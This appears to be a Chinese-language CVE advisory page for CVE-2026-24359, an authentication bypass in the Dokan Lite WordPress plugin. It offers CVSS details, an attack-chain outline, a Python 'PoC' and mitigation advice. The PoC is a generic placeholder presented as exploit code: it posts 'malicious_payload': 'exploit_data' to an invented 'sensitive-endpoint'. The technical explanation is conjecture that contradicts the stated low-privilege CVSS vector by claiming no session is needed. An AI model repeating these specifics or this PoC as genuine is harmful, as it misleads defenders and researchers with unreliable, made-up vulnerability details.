CVE-2026-24359 CVSS 8.8 高危

CVE-2026-24359 Dokan插件认证绕过漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-24359

漏洞类型

认证绕过

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Dokan dokan-lite

漏洞概述

Dokan Lite插件存在严重的认证绕过漏洞，攻击者可通过备用路径或信道绕过身份验证机制，实施认证滥用。该漏洞影响Dokan Lite 4.2.4及以下版本。由于漏洞利用无需用户交互且攻击复杂度低，攻击者可借此获取高权限，对系统的机密性、完整性和可用性造成严重影响。

技术细节

该漏洞的核心在于插件在处理特定请求路径时，存在逻辑缺陷，导致权限校验被绕过。通常，WordPress插件通过 `current_user_can()` 等函数检查权限，但受影响版本的Dokan Lite在某些API端点或隐藏路径中未实施此类检查。攻击者无需有效的用户会话Cookie，即可直接构造HTTP请求访问受限功能（如供应商注册、数据修改等）。这种“备用路径”绕过方式使得攻击者能够以低权限或无权限身份提升至高权限，进而控制受影响账户或篡改网站数据。

攻击链分析

STEP 1

信息收集

攻击者扫描目标网站，识别是否使用了Dokan Lite插件及其具体版本。

STEP 2

漏洞探测

攻击者向已知的易受攻击的备用路径（如特定REST API端点）发送测试请求，观察响应。

STEP 3

认证绕过

利用漏洞逻辑缺陷，在不提供有效凭证或会话的情况下，通过验证机制。

STEP 4

权限提升与利用

执行未授权的管理员操作，如篡改数据、获取敏感信息或进一步控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual target)
target_url = "http://example.com/wp-json/dokan/v1/sensitive-endpoint"

# Attacker attempts to access a restricted endpoint without authentication
# The vulnerability allows bypassing the usual auth check via an alternate path
try:
    response = requests.post(
        target_url,
        data={
            "action": "update_settings",
            "malicious_payload": "exploit_data"
        }
    )

    if response.status_code == 200:
        print("[+] Authentication bypass successful! Response:")
        print(response.text)
    else:
        print("[-] Failed to exploit. Status code:", response.status_code)

except Exception as e:
    print("[!] Error:", str(e))

影响范围

Dokan dokan-lite <= 4.2.4

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用Dokan Lite插件，或通过服务器配置（如.htaccess或Nginx规则）阻断对特定插件API路径的非授权访问，直到补丁应用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表